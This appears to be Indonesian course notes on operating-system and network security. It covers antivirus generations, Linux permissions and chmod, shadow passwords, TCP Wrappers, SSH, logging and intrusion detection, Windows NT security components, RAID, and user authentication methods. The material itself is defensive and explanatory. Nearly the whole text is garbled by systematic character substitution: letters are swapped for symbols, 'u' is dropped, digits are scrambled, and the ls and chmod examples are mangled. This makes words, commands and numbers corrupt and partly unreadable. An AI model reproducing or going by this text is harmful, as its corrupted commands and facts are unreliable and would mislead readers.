tia# #"og"am. 6i$a 3i"s mengin(e$si #"og"am tan#a meng+ah )he)$sm, ma$a
#eme"i$saan integ"itas a$an menem$an #e"+ahan it. Unt$ menangg%angi 3i"s
)anggih &ang mam# meng+ah )he)$sm saat mengin(e$si #"og"am, (ngsi hash
te"en$"i#si digna$an. Kn)i en$"i#si disim#an se)a"a te"#isah da"i #"og"am sehingga
#"og"am tida$ da#at menghasi%$an $ode hash +a" dan mengen$"i#sin&a. Dengan
menggna$an (ngsi hash +$an )he)$sm sede"hana ma$a men)egah 3i"s
men&esai$an #"og"am &ang menghasi%$an $ode hash &ang sama se#e"ti
se+e%mn&a.
?. 2eneras! #et!a : ,e+a$an0,e+a$an a$ti3itas 'a)ti3it& t"a#*.
P"og"am anti3i"s me"#a$an #"og"am &ang meneta# di memo"i 'memo"& "esident
#"og"am*. P"og"am ini mengidenti(i$asi 3i"s me%a%i a$si0 a$sin&a +$an da"i
st"$t" #"og"am &ang diin(e$si. Dengan anti3i"s sema)am in ta$ #e"%
mengem+ang$an #enanda0#enanda dan at"an0at"an #inta" nt$ +e"agam 3i"s
&ang sangat +an&a$. Dengan )a"a ini &ang di#e"%$an ada%ah mengidenti(i$asi
$m#%an inst"$si &ang +e",m%ah sedi$it &ang mengidenti(i$asi adan&a saha
in(e$si. Ka%a mn)% $e,adian ini, #"og"am anti3i"s sege"a menginte"3ensi.
@. 2eneras! #eempat : #"ote$si #enh '(%% (eat"ed #"ote)tion*.
Anti3i"s gene"asi ini menggna$an +e"agam te$ni$ anti3i"s se)a"a +e"samaan.
Te$ni$0te$ni$ ini me%i#ti s)anning dan ,e+a$an0,e+a$an a$ti3itas. Anti3i"s ,ga
mem#n&ai sena"ai $a#a+i%itas #enga$sesan &ang mem+atasi $emam#an 3i"s
memas$i sistem dan mem+atasi $emam#an 3i"s memodi(i$asi (i%e nt$
mengin(e$si (i%e. Pe"tem#"an anta"a #en%is 3i"s dan #em+at anti3i"s masih
+e"%an,t. =a%a +e"agam st"ategi %e+ih %eng$a# te%ah di+at nt$ menangg%angi
3i"s, #en%is 3i"s #n masih +e"%an,t men%is 3i"s &ang da#at me%e4ati +a"i$ade0
+a"i$ade &ang di+at #en%is anti3i"s. Unt$ #engaman sistem $om#te", se+ai$n&a
#enga$sesandan #ema$aian $om#te" dia4asi dengan se$sama sehingga tida$
men,a%an$an #"og"am ata mema$ai dis$ &ang +e%m te",amin $e+e"sihann&a da"i
in(e$si 3i"s. Pen)egahan te"+ai$ te"hada# an)aman 3i"s ada%ah men)egah 3i"s
memas$i sistem disaat &ang #e"tama.
KEAMANAN SISTEM OPERASI
L!nu<
Komponen Ars!te#tur Keamanan L!nu< :
)* A,,ount Pema#a! 'user a,,ount9
Kentngan :
Ke$asaan da%am sat a))ont &ait "oot, sehingga mdah da%am
administ"asi s&stem.
Ke)e"o+ohan sa%ah sat se" tida$ +e"#enga"h $e#ada s&stem se)a"a
$ese%"han.
Masing0masing se" memi%i$i #"i3a)& &ang $etat
Ma)am Use" :
Root : $ont"o% s&stem (i%e, se", sm+e" da&a 'de3i)es* dan a$ses ,a"ingan
Use" : a))ont dengan $e$asaan &ang diat" o%eh "oot da%am me%a$$an a$ti(itas da%am
s&stem.
G"o# : $m#%an se" &ang memi%i$i ha$ sha"ing &ang se,enis te"hada# sat de3i)es
te"tent.
4* Kontrol A#ses se,ara D!s#res! 'D!s,ret!onar& A,,ess ,ontrol9
Dis)"etiona"& A))ess )ont"o% 'DA1* ada%ah metode #em+atasan &ang $etat, &ang me%i#ti :
Setia# a))ont memi%i$i se"name dan #ass4o"d sendi"i.
Setia# (i%e2de3i)e memi%i$i at"i+t'"ead24"ite2eKe)tion* $e#emi%i$an, g"o#, dan se"
mm.
6i$a $ita %a$$an %ist se)a"a detai% menggna$an I%s Y%, $ita da#at me%ihat #ene"a#an DA1
#ada (i%e s&stem %inK :
d r! x " fade users #$%& 'eb ( #%)*$ Desktop
r! r r + ,oh hack *#( -ar *$ $+)$" borg.dead.letter
0 "40 " 0 0 " 0 0 : Goh ha)$ ?9
J
Ma" ?
G
G::G8 +o"g.dead.%ette"
) 4 5 6 7 8 = > ? )@ ))
Kete"angan :
9 X ti#e da"i (i%e - tanda dash ' 0 * +e"a"ti
(i%e +iasa, d +e"a"ti di"e)to"&, % +e"a"ti
(i%e %in$, ds+
8 X
D X
; X
6m%ah %in$ (i%e
Nama #emi%i$ 'o4ne"*
Nama G"o#
Mi"s tida$ a$an men)a#ai (i%e s&stem, ,i$a se+ah se"
te"$ena, ma$a a$an +e"#enga"h #ada (i%e0(i%e &ang dimi%i$i
o%eh se" &ang menge$se$si (i%e te"se+t.
> X IEin a$ses nt$ o4ne" '#emi%i$*,
"X"ead2+a)a, 4X4"ite2t%is,
KXeKe)te2e$se$si
J X
: X
9G X
!esa" (i%e da%am +&te
!%an dan tangga% #date te"a$hi"
=a$t #date te"a$hi"
? X IEin a$ses nt$ g"o# 99 X Nama (i%e2de3i)e
@ X IEin a$ses nt$ othe" 'se" %ain &ang
+e"ada di %a" g"o# &ang dide(inisi$an
se+e%mn&a*
Pe"intah0#e"intah #enting #ada DA1 :
Meng+ah iEin a$ses (i%e :
9. + : ,"mod A u B B o C A D B . C A r B E B e C nama %!le,
)ontoh :
)hmod [K g[4 o0" +o"g.dead.%ette" - tam+ah$an a$ses e$se$si'e* nt$ se" '*,
tam+ah$an ,ga a$ses 4"ite'4* nt$ g"o# 'g* dan $"angi iEin a$ses "ead'"* nt$
othe"'o* se".
>. )hmod metode o)ta%, +: ,"mod . . . nama%!le , digit dash ' 0 *
#e"tama nt$ iEin a$ses se", digit $e0> nt$ iEin a$ses g"o# dan digit $e0? nt$
iEin a$ses othe", +e"%a$ $etentan : "'"ead* X @, 4'4"ite* X >, K 'eKe)te* X 9 dan
tan#a iEin a$ses X G.
1ontoh :
1hmod ;@G +o"g.dead.%ette"
!e"a"ti : +agi (i%e bor/*dead*letter +e"%a$
digit $e09 ;X@[>[9XiEin a$ses ",4,K #enh nt$ se".
digit $e0> @X@[G[GXiEin a$ses " nt$ g"o#
digit $e0? GXG[G[GXtan#a iEin a$ses nt$ othe" se".
Meng+ah $e#emi%i$an : )ho4n No4ne"2#emi%i$ONnama (i%eO
Meng+ah $e#emi%i$an g"o# : )hg"# Ng"o# o4ne"ONnama (i%eO
Menggna$an a))ont "oot nt$ sementa"a :
\Is - s&stem a$an meminta #ass4o"d
#ass4o"d : VVVV - #"om#t a$an +e"+ah ,adi #aga", tanda %ogin se+agai "oot
\]
Menga$ti($an shado4 #ass4o"d, &ait mem+at (i%e -et,-passEd men,adi da#at di+a)a
'"eada+%e* teta#i tida$ %agi +e"isi #ass4o"d, $a"ena sdah di#indah$an $e -et,-s"adoE
1ontoh ti#i$a% (i%e -et,-passEd sete%ah dia$ti($an shado4:
.
root)x)$)$))/root)/bin/bash
fade)x)#$$$)#$*) , , , )/home/fade)/bin/bash
.
Lihat se" (ade, da#at $ita +a)a se+agai +e"i$t :
se"name : (ade
Pass4o"d : K
Use" ID 'UID* : 9GGG
G"o# ID 'GUID* : 9G?
Kete"angan tam+ahan : 0
Home di"e)to"& : 2home2(ade
She%% de(a%t : 2+in2+ash
Pass4o"d0n&a +isa di+a)a '"eada+%e*, ta#i +e"#a h"( K sa,a, #ass4o"d se+ena"n&a disim#an
di (i%e -et,-s"adoE da%am $eadaan dien$"i#si :
.
root)pCfoulj01023o)#$++")$)))))
fade)oi45!6,1f&ti7)#$++")$)+++++)3)))
.
Perlun&a Pro a#t!% passEord
LinK menggna$an metode DES 'Data En)"i#tion Standa"t* nt$ #ass4o"d0n&a. Use" ha"s
di t"aining da%am memi%ih #ass4o"d &ang a$an digna$ann&a aga" tida$ mdah dite+a$
dengan #"og"am0#"og"am )"a)$ #ass4o"d da%am an)aman +"to (o")e atta)$. Dan #e"% #%a
ditam+ah dengan #"og"am !ant )e$ $eamanan #ass4o"d se#e"ti :
Pass4d[ : mening$at$an %oging dan mengingat$an se" ,i$a mengisi #ass4o"d &ang
mdah dite+a$, (t#:22(t#.da"tmoth.ed2#+2se)"it&
An%#ass4d : da#at mem+at at"an standa" #engisian #ass4o"d se#e"ti +atas minimm,
ga+ngan h"( +esa" dengan h"( $e)i%, ga+ngan ang$a dan h"( ds+,
(t#:22)oast."s.#"de.ed2#+2too%s2niK2
5* Kontrol a#ses jar!nan 'NetEor# A,,ess Control9
3!reEall l!nu<
9
:
a%at #engont"o%an a$ses anta" ,a"ingan &ang mem+at %inK da#at memi%ih host &ang +e"ha$ 2
tida$ +e"ha$ menga$sesn&a.
3uns! 3!reEall l!nu< :
Ana%isa dan (i%te"ing #a$et
Meme"i$sa #a$et T1P, %a% di#e"%a$$an dengan $ondisi &ang sdah ditent$an, )ontoh
#a$et A %a$$an tinda$an !.
!%o)$ing )ontent dan #"oto)o%
!%o$ing isi #a$et se#e"ti a##%et ,a3a, a)ti3eP, M+s)"i#t, 1oo$ies
Atenti$asi $one$si dan en$"i#si
Men,a%an$an en$"i#si da%am identitas se", integ"itas sat session dan me%a#isi data
dengan a%go"itma en$"i#si se#e"ti : DES, t"i#%e DES, !%o4(ish, IPSe), SHA, MD8, IDEA,
ds+.
T!pe %!reEall l!nu< :
A##%i)ation0#"oK& (i"e4a%%2A##%i)ation Gate4a&s
Di%a$$an #ada %e3e% a#%i$asi di %a&e" OSI, s&stem #"oK& ini mene"s$an 2 mem+agi
#a$et0#a$et $e da%am ,a"ingan inte"na%. 1ontoh : so(t4a"e TIS F=TK 'T"sted
In(o"mation S&stem Fi"e4a%% Too%$it*
Net4o"$ %e3e% Fi"e4a%%, (ngsi (i%te" dan +%o$ing #a$et di%a$$an di "ote". 1ontoh :
T1P="a##e"s, a#%i$asin&a ada di 2s"2s+in2t)#d. 1a"a $e",an&a :
Lihat isi (i%e -et,-!netd*,on% :
...
telnet stream tcp no!ait root /usr/sbin/telnetd
shell stream tcp no!ait root /usr/sbin/rshd
pop* stream tcp no!ait root /usr/sbin/pop*d
.
dengan dia$ti($an T1P4"a##e"s ma$a isi (i%e -et,-!netd*,on% :
...
telnet stream tcp no!ait root /usr/sbin/tcpd in.telnetd
9
Unt$ mem+eda$an (i"e4a%% &ang built-in di %inK dengan (i"e4a%% dedi)ated &ang +an&a$ digna$an da%am
te$no%ogi ,a"ingan, ma$a digna$an isti%ah (i"e4a%% %inK.
shell stream tcp no!ait root /usr/sbin/tcpd in.rshd 8
pop* stream tcp no!ait root /usr/sbin/tcpd in.pop*d
.
setia# ada #e"mintaan %a&anan ,a"a$ ,ah, di#otong d% dengan #en)o)o$an "%e set &ang
te%ah diat" o%eh t,p !n, ,i$a memenhi s&a"at dite"s$an $e (i%e &ang a$an die$ses$si,
ta#i ,i$a tida$ memenhi s&a"at digaga%$an.
Pengat"an T1P="a##e" di%a$$an dengan meng$on(ig"asi > (i%e, &ait :
2et)2host.a%%o4 host &ang di#e"+o%eh$an menga$ses.
2et)2host.den& host &ang tida$ di#e"+o%eh$an menga$ses.
6* En#r!ps! 'en,r&pt!on9
Pene"a#an En$"i#si di %inK :
En$"i#si #ass4o"d menggna$an DES ' Data En)"&#tion Standa"d *
En$"i#si $omni$asi data :
9. (e,ure ("ell '((H9 P"og"am &ang me%a$$an %oging te"hada# $om#te" %ain
da%am ,a"ingan, menge$se$si #e"intah %e4at mesin se)a"a "emote dan memindah$an
(i%e da"i sat mesin $e mesin %ainn&a. En$"i#si da%am +ent$ !%o4(ish, IDEA, RSA,
T"i#%e DES. Isi SSH Site :
s)# 'se)"e she%% )o#&* mengaman$an #enggandaan data
ssh 'se)"e she%% )%ient* mode% )%ient ssh se#e"ti te%net te"en$"i#si.
ssh0agent otenti$asi %e4at ,a"ingan dengan mode% RSA.
sshd 'se)"e she%% se"3e"* di #o"t >>
ssh0$e&gen #em+at $n)i '$e& gene"ato"* nt$ ssh
Kon(ig"asi di%a$$an di :
2et)2sshdQ)on(ig '(i%e $on(ig"asi se"3e"*
2et)2sshQ)on(ig '(i%e $on(ig"asi )%ient*
>. (e,ure so,#et La&er '((L9 mengen$"i#si data &ang di$i"im$an %e4at #o"t htt#.
Kon(ig"asi di%a$$an di : 4e+ se"3e" APA1HE dengan ditam+ah PAT1H SSL.
7* Lo!n
De% : P"osed" da"i Sistem O#e"asi ata a#%i$asi me"e$am setia# $e,adian dan men&im#an
"e$aman te"se+t nt$ da#at diana%isa.
Sema (i%e %og %inK disim#an di di"e)to"& 23a"2%og, anta"a %ain :
Lastlo : "e$aman se" %ogin te"a$hi" $a%i
last : "e$aman se" &ang #e"nah %ogin dengan men)a"in&a #ada (i%e 23a"2%og24tm#
<%erlo : "e$aman in(o"masi %ogin di (t# daemon +e"#a data 4$t a$ses, d"asi t"ans(e"
(i%e, i# dan dns host &ang menga$ses, ,m%ah2nama (i%e, ti#e t"ans(e"'+ina"&2AS1II*, a"ah
t"ans(e"'in)oming2otgoing*, mods a$ses'anon&mos2gest2se" "esmi*, nama2id2%a&anan
se" dan metode otenti$asi.
A,,essFlo : "e$aman %a&anan htt# 2 4e+se"3e".
ErrorFlo : "e$aman #esan $esa%ahan atas se"3i)e htt# 2 4e+se"3e" +e"#a data ,am dan
4a$t, ti#e2a%asan $esa%ahan
Messaes : "e$aman $e,adian #ada $e"ne% ditangani o%eh da daemon :
o S&s%og me"e$am sema #"og"am &ang di,a%an$an, $on(ig"asi #ada
s&s%og.)on(
o K%og mene"ima dan me"e$am sema #esan $e"ne%
8* Dete#s! Pen&usupan 'Intrus!on Dete,t!on9
De% : a$ti3itas mendete$si #en&s#an se)a"a )e#at dengan menggna$an #"og"am $hss
se)a"a otomatis &ang dise+t Int"sion Dete)tion S&stem
T!pe dasar ID( :
R%ed +ased s&stem : men)atat %a% %intas data ,i$a sesai dengan data+ase da"i tanda
#en&s#an &ang te%ah di$ena%, ma$a %angsng di$atego"i$an #en&s#an. Pende$atan
R%ed +ased s&stem :
o P"eem#to"& '#en)egahan* - IDS a$an mem#e"hati$an sema %a% %intas ,a"ingan,
dan %angsng +e"tinda$ ,i$a di)"igai ada #en&s#an.
o Rea)tiona"& '"ea$si* - IDS han&a mengamati (i%e %og sa,a.
Ada#ti3e s&stem : #ene"a#an eK#e"t s&stem da%am mengamati %a% %intas ,a"ingan.
Proram ID( :
C"#Etmp : #"og"am #enge)e$an te"hada# ent"& $osong
T,plod : #"og"am #endete$si stea%th s)an 's)anning &ang di%a$$an tan#a mem+at
sesi t)#*
Host entr& : #"og"am #endete$si %ogin anoma%& '#e"i%a$ aneh* +iEa""e +eha3io"
'#e"i%a$ aneh*, time anoma%ies 'anoma%& 4a$t*, %o)a% anoma%&.
;!ndoEs NT
Komponen Ars!te#tur Keamanan NT :
)* Adm!n!sras! User dan 2roup
1en!s A,,ount User :
Administ"ato"
Gest
Use"
1en!s A,,ount 2orup :
Administ"ato"
Gest
Use"
O#e"ato" +a)$0#
Po4e" se"
O#e"ato" se"3e"
O#e"ato" a))ont
O#e"ato" #"inte"
Ha# User - 2rup :
Ha$ +asi) : a))es )om#te" ("om net4o"$, +a)$0# (i%es2di"e)to"&, )hange s&stem time,
%ogon %o)a%%&, manage aditing and se)"it&, %og 'e3ent 3ie4e"*, "esto"e (i%es and
di"e)to"&, shtdo4n s&stem, ta$e o4ne"shi# (i%es o" othe" o+,e)t, d%%.
Ha$ ad3an)e : a))ess se"3i)e and $e"ne% nt$ $e+than #engem+angan s&stem.
4* Keamanan untu# s&stem 3!le
A* NT3( :
1e#at da%am o#e"asi standa" (i%e '"ead Y 4"ite Y sea")h*
Te"da#at s&stem (i%e "e)o3e"&, a))ess )ont"o% dan #e"mission.
Memandang o+&e$ se+agai $m#%an at"i+t, te"mas$ #e"mission a))ess.
0* Prote#s! untu# !nter!tas data
Transa,t!on lo!n : me"#a$an s&stem (i%e &ang da#at di0"e)o3e"& nt$ da#at men)atat
sema #e"+ahan te"a$hi" #ada di"e)to"& dan (i%e se)a"a otomatis.
6i$a t"ansa$si s&stem +e"hasi% NT a$an me%a$$an #em+aha"an #ada (i%e.
6i$a t"ansa$si gaga%, NT a$an me%a%i :
Taha# ana%isis : meng$" $e"sa$an dan menent$an %o$asi )%ste" &ang ha"s
di#e"+a"i #e" in(o"masi da%am (i%e %og.
Taha# "edo : me%a$$an sema taha#an t"ansa$si &ang di)atat #ada titi$ #e"i$sa
te"a$hi"
Taha# ndo : mengem+a%i$an $e $ondisi sem%a nt$ sema t"ansa$si &ang +e%m
se%esai di$e",a$an.
(e,tor spar!n : Te$ni$ d&nami) data "e)o3e"& &ang han&a te"da#at #ada dis$ S1SI dengan
)a"a meman(aat$an te$no%ogi (a%t0to%e"ant 3o%me nt$ mem+at d#%i$at data da"i
se)to" &ang menga%ami e""o". Metoden&a ada%ah dengan me"e$a%$%asi da"i st"i#e set
4ith #a"it& ata dengan mem+a)a se)to" da"i mi""o" d"i3e dan men%is data te"se+t
$e se$to" +a".
Cluster remapp!n : 6i$a ada $egaga%an da%am t"ansa$si I2O #ada dis$ , se)a"a otomatis a$an
men)a"i )%ste" +a" &ang tida$ "sa$, %a% menandai a%amat )%ste" &ang mengandng +ad
se)to" te"se+t.
C* 3ault toleran,e : Kemam#an nt$ men&edia$an "eddansi data se)a"a "ea%time &ang
a$an mem+e"i$an tinda$an #en&e%amatan +i%a te",adi $egaga%an #e"ang$at $e"as, $o"#si
#e"ang$at %na$ dan $emng$inan masa%ah %ainn&a.
Te$no%ogin&a dise+t RAID 'Reddant A""a&s o( ineK#ensi3e Dis$* : se+ah a""a& dis$
dimana da%am se+ah media #en&im#anan te"da#at in(o"masi "eddan tentang data &ang
disim#an di sisa media te"se+t.
Ke%e+ihan RAID :
Mening$at$an $ine",a I2O
mening$at$an "ea+i%itas media #en&im#anan
Ada > +ent$ (a%t to%e"an)e :
9. Dis$ mi""o"ing 'RAID 9* : me%i#ti #en%isan data se)a"a sim%tan $eda
media #en&im#anan &ang se)a"a (isi$ te"#isah.
>. Dis$ st"i##ing dengan Pa"it& 'RAID 8* : data dit%is da%am st"i#0st"i# %e4at
sat a""a& dis$ &ang dida%am st"i#0st"i# te"se+t te"da#at in(o"masi #a"it& &ang da#at
digna$an nt$ me"egene"asi data a#a+i%a sa%ah sat dis$ de3i)e da%am st"i# set
menga%ami $egaga%an.
5* Model Keamanan ;!ndoEs NT
Di+at da"i +e+e"a#a $om#onen &ang +e$e",a se)a"a +e"sama0sama nt$ mem+e"i$an
$eamanan %ogon dan a))ess )ont"o% %ist 'A1L* da%am NT :
L(A 'Lo,al se,ur!t& Aut"or!t&9 : men,amin se" memi%i$i ha$ nt$ menga$ses s&stem.
Inti $eamanan &ang men)i#ta$an a$ses to$en, mengadminist"asi $e+i,a$an $eamanan
%o)a% dan mem+e"i$an %a&anan otenti$asi se".
P"oses %ogon : mene"ima #e"mintaan %ogon da"i se" '%ogon inte"a$ti( dan %ogon "emote*,
menanti mas$an se"name dan #ass4o"d &ang +ena". Di+ant o%eh Net%ogon se"3i)e.
(e,ur!t& A,,ount Manaer '(AM9 : di$ena% ,ga se+agai di"e)to"& se"3i)e data+ase,
&ang meme%iha"a data+ase nt$ a))ont se" dan mem+e"i$an %a&an 3a%idasi nt$
#"oses LSA.
(e,ur!t& Re%eren,e Mon!tor '(RM9 : meme"i$sa stats iEin se" da%am menga$ses, dan
ha$ se" nt$ memani#%asi o+&e$ se"ta mem+at #esan0#esan adit.
6* Keamanan (umber da&a lo#al
O+&e$ da%am NT 7(i%e, (o%de" 'di"e)to"&*, #"oses, th"ead, sha"e dan de3i)e<, masing0masing
a$an di%eng$a#i dengan Ob&e# (e,ur!t& Des,r!ptor &ang te"di"i da"i :
Se)"it& ID O4ne" : menn,$$an se"2g"# &ang memi%i$i o+&e$ te"se+t, &ang
memi%i$i $e$asaan nt$ meng+ah a$ses #e"mission te"hada# o+&e$ te"se+t.
Se)"it& ID g"o# : digna$an o%eh s+sistem POSIP sa,a.
Dis)"etiona"& A1L 'A))ess 1ont"o% List* : identi(i$asi se" dan g"# &ang
di#e"+o%eh$an 2 dito%a$ da%am menga$ses, di$enda%i$an o%eh #emi%i$ o+&e$.
S&stem A1L : mengenda%i$an #esan aditing &ang di+ang$it$an o%eh s&stem,
di$enda%i$an o%eh administ"ato" $eamanan ,a"ingan.
7* Keamanan 1ar!nan
1en!s Keamanan 1ar!nan ;!ndoEs NT :
Mode% $eamanan se" %e3e% : a))ont se" a$an menda#at$an a$ses nt$ #ema$aian
+e"sama dengan men)i#ta$an sha"e atas di"e)to"& ata #"inte".
o Kengg%an : $emam#an nt$ mem+e"i$an se" te"tent a$ses $e sm+e"da&a
&ang di0sha"e dan menent$an ,enis a$ses a#a &ang di+e"i$an.
o Ke%emahan : #"oses set# &ang $om#%e$s $a"ena administ"ato" ha"s mem+e"itah
setia# se" dan men,aga #o%i)& s&stem $eamanan teta# da#at di+a4ah $enda%in&a
dengan +ai$.
Mode% $eamanan Sha"e %e3e% : di$ait$an dengan ,a"ingan #ee" to #ee", dimana se"
mana#n mem+agi sm+e" da&a dan memts$an a#a$aha di#e"%$an #ass4o"d nt$
sat a$ses te"tent.
o Kentngan : $esede"hanaann&a &ang mem+at $eamanan sha"e0%e3e% tida$
mem+th$an a))ont se" nt$ menda#at$an a$ses.
o Ke%emahan : se$a%i iEin a$ses 2 #ass4o"d di+e"i$an, tida$ ada $enda%i atas sia# &ang
mena$ses sm+e" da&a.
Cara NT menanan! #eamanan jar!nan :
9. Mem+e"i$an #e"mission :
Pe"mission NTFS %o)a%
Pe"mission she"e
>. Keamanan RAS 'Remote A))ess Se"3e"*
Me%a$$an "emote a))ess se" menggna$an dia%0# :
Otenti$asi se" name dan #ass4o"d &ang 3a%id dengan dia%0in #e"mission.
1a%%+a)$ se)"it& : #enge)e$an nomo" te%e#on &ang 3a%id.
Aditing : menggna$an aditing t"ai%s nt$ me%a)a$ $e2da"i sia#a, $a#an
se" memi%i$i a$ses $e se"3e" dan sm+e"da&a a#a &ang dia$ses.
?. Pengamanan La&anan inte"net :
Fi"e4a%% te"+atas #ada Inte"net In(o"mation se"3e" 'IIS*.
Menginsta% tam+ahan #"oK& se#e"ti Mi)"oso(t P"oK& se"3e".
@. Sha"e administ"ati3e :memng$in administ"ato" menda#at$an a$ses $e se"3e"
4indo4s NT ata 4o"$station me%a%i ,a"ingan
8* Keamanan pada pr!nter
Di%a$$an dengan mensetting #"o#e"ties #"inte" :
9. Menent$an #e"mission : (%% )ont"o%, Manage do)ment, #"int
>. !iasan&a ssnan #e"mission #ada NT de(a%t :
Adminst"ato" Y (%% )ont"o%
O4ne" Y Manage do)ment
Sema se" Y #"int
?. Mengont"o% #"int ,o+, te"di"i da"i :
Setting 4a$t )eta$
P"io"itas
Noti(i$asi 'o"ang &ang #e"% di+e"i #e"ingatan*
@. Set aditing in(o"mation
=* Keamanan Re!str&
Too%s &ang disedia$an da%am #enga$sesan "egist"& :
S&stem #o%i)& edito" : mengont"o% a$ses te"hada# "egist"& edito", memng$in$an
administ"ato" mengedit dan memodi(i$asi 3a%e te"tent da%am "egist"& dengan +e"+asis
g"a(is.
Regist"& edito" '"egedit?>.eKe* : too%s nt$ me%a$$an edit dan modi(i$asi 3a%e da%am
"egist"&.
=indo4s NT Diagnosti)s '4inmsd.eKe* : memng$in$an se" me%ihat setting isi "egist"&
dan 3a%en&a tan#a ha"s mas$ $e "egist"& edito" sendi"i.
Tools ba,#up untu# re!str& &a!tu :
Reg+a)$.eKe meman(aat$an )ommand %ine 2 "emote session nt$ mem+a)$#" "egist"&.
nt+a)$#.eKe : otomatisasi +a)$# HANCA #ada Ta#e d"i3e, te"mas$ se+ah $o#i da"i
(i%e +a)$# "egist"& %o)a%.
Eme"gen)& Re#ai" Dis$ '"dis$.eKe* : mem+a)$0# hi3e s&stem dan so(t4a"e da%am
"egist"&.
>* Aud!t dan Pen,atatan Lo
Pen)atatan %ogon dan %ogo(( te"mas$ #en)atatan da%am m%ti ent"& %ogin
O+,e)t a))ess '#en)atatan a$ses o+&e$ dan (i%e*
P"i3i%ege Use '#aen)atatan #ema$aian ha$ se"*
A))ont Management 'mana,emen se" dan g"o#*
Po%i)& )hange 'Pen)atatan #e"+ahan $e+i,a$an $eamanan*
S&stem e3ent '#en)atatan #"oses "esta"t, shtdo4n dan #esan s&stem*
Detai%ed t"a)$ing '#en)atatan #"oses da%am s&stem se)a"a detai%*
KEAMANAN JARINGAN
)* Membatas! A#ses #e 1ar!nan
A* Membuat t!n#atan a#ses :
Pem+atasan0#em+atasan da#at di%a$$an sehingga mem#e"$e)i% #e%ang #enem+san o%eh
#ema$ai &ang ta$ dioto"isasi, misa%n&a :
Pem+atasan %ogin. Login han&a di#e"+o%eh$an :
Pada te"mina% te"tent.
Han&a ada 4a$t dan ha"i te"tent.
Pem+atasan dengan )a%%0+a)$ 'Login da#at di%a$$an sia#a#n. !i%a te%ah s$ses
%ogin, sistem sege"a memts$an $one$si dan memanggi% nomo" te%e#on &ang te%ah
dise#a$ati, Pen&s# tida$ da#at mengh+ngi %e4at sem+a"ang sa%"an te%e#on,
ta#i han&a #ada sa%"an te%e#on te"tent*.
Pem+atasan ,m%ah saha %ogin.
Login di+atasi sam#ai tiga $a%i dan sege"a di$n)i dan di+e"itah $e administ"ato".
Sema %ogin di"e$am dan sistem o#e"asi me%a#o"$an in(o"masi0in(o"masi +e"i$t :
=a$t, &ait 4a$t #ema$ai %ogin.
Te"mina%, &ait te"mina% dimana #ema$ai %ogin.
Ting$at a$ses &ang diiEin$an ' "ead 2 4"ite 2 eKe)te 2 a%% *
0* Me#an!sme #endal! a#ses :
Masa%ah identi(i$asi #ema$ai $eti$a %ogin dise+t otenti(i$asi #ema$ai 'se" athenti)ation*.
Ke+an&a$an metode otenti(i$asi didasa"$an #ada tiga )a"a, &ait :
9. Sesat &ang di$etahi #ema$ai, misa%n&a :
Pass4o"d.
Kom+inasi $n)i.
Nama $e)i% i+ me"ta.
Dan se+again&a.
>. Sesat &ang dimi%i$i #ema$ai, misa%n&a :
!adge.
Ka"t identitas.
Kn)i.
Dan se+again&a.
?. Sesat mengenai ')i"i* #ema$ai, misa%n&a :
Sidi$ ,a"i.
Sidi$ sa"a.
Foto.
Tanda tangan.
C* ;aspada ter"adap Re#a&asa sos!al :
9. Menga$ se+agi e$se$ti( &ang tida$ +e"hasi% menga$ses,
mengh+ngi administ"ato" 3ia te%e#on2(aK.
>. Menga$ se+agai administ"ato" &ang #e"% mendiagnosa
masa%ah net4o"$, mengh+ngi end se" 3ia emai%2(aK2s"at.
?. Menga$ se+agai #etgas $eamanan e0)omme")e,
mengh+ngi )stome" &ang te%ah +e"t"ansa$si nt$ meng%ang $em+a%i
t"ansa$sin&a di (o"m &ang disedia$an o%ehn&a.
@. #en)"ian s"at, #ass4o"d.
8. #en&a#an, $e$e"asan.
D* Membeda#an (umber da&a !nternal dan E#sternal :
Meman(aat$an te$no%ogi (i"e4a%% &ang memisah$an net4o"$ inte"na% dengan net4o"$
e$ste"na% dengan "%e te"tent.
E* (!stem Otent!#as! User :
De% : ada%ah #"oses #enentan identitas da"i seseo"ang &ang se+ena"n&a, ha% ini di#e"%$an
nt$ men,aga $ethan ' integ"it& * dan $eamanan ' se)"it& * data, #ada #"oses ini
seseo"ang ha"s di+$ti$an sia#a di"in&a se+e%m menggna$an %a&anan a$ses.
Upa&a untu# leb!" menaman#an prote#s! passEordG antara la!n :
9. Sa%ting.
Menam+ah$an st"ing #ende$ $e st"ing #ass4o"d &ang di+e"i$an #ema$ai
sehingga men)a#ai #an,ang #ass4o"d te"tent.
>. One time #ass4o"d.
Pema$ai ha"s mengganti #ass4o"d se)a"a te"at". U#a&a ini mem+atasi #e%ang
#ass4o"d te%ah di$etahi ata di)o+a0)o+a #ema$ai %ain.
!ent$ e$st"im #ende$atan ini ada%ah one time #ass4o"d, &ait #ema$ai menda#at
sat +$ +e"isi da(ta" #ass4o"d. Setia# $a%i #ema$ai %ogin, #ema$ai menggna$an
#ass4o"d +e"i$tn&a &ang te"da#at di da(ta" #ass4o"d.
Dengan one time #ass4o"d, #ema$ai di"e#ot$an $eha"san men,aga aga" +$
#ass4o"dn&a ,angan sam#ai di)"i.
?. Sat da(ta" #an,ang #e"tan&aan dan ,a4a+an.
Ma"iasi te"hada# #ass4o"d ada%ah mengha"s$an #ema$ai mem+e"i sat da(ta"
#e"tan&aan #an,ang dan ,a4a+ann&a. Pe"tan&aan0#e"tan&aan dan ,a4a+ann&a
di#i%ih #ema$ai sehingga #ema$ai mdah mengingatn&a dan ta$ #e"% men%is$an
di $e"tas.
Pe"tan&aan +e"i$t da#at di#a$ai, misa%n&a :
Sia#a me"ta a+ang i#a" !ad" L
A#a &ang dia,a"$an Pa$ Ha"n 4a$t SD L
Di ,a%an a#a #e"tama $a%i ditem$an simanis L
Pada saat %ogin, $om#te" memi%ih sa%ah sat da"i #e"tan&aan0#e"tan&aan se)a"a
a)a$, menan&a$an $e #ema$ai dan meme"i$sa ,a4a+an &ang di+e"i$an.
@. Tantangan tangga#an ')ha%enge "es#onse*.
Pema$ai di+e"i $e+e+asan memi%ih sat a%go"itma, misa%n&a K?.
Keti$a #ema$ai %ogin, $om#te" men%is$an di %a&a" ang$a ?. Da%am $ass ini
#ema$ai mengeti$ ang$a >;. A%go"itma da#at +e"+eda di #agi, so"e, dan ha"i
+e"+eda, da"i te"mina% +e"+eda, dan sete"sn&a.
Conto" Produ# Otent!#as! UserG antara la!n :
9. Se)"eid A1E 'A))ess 1ont"o% En)"&#tion*
S&stem to$en ha"d4a"e se#e"ti $a"t $"edit +e"dis#%a&, #ema$ai a$an mengin#t
nomo" #in &ang di$etahi +e"sama, %a% memas$$an #as)ode +ah4a dia #emi%i$
to$en.
